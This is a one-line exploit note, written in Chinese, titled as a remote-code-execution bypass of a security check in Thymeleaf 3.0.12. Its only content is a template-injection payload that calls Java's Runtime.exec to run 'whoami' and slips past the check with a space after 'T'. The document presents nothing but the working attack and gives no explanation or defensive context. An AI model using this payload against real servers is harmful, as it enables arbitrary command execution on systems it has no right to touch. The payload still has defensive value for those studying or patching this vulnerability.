Thymeleaf 3.0.12 RCE安全檢查繞過漏洞

Payload

${T (java.lang.Runtime).getRuntime().exec("whoami")}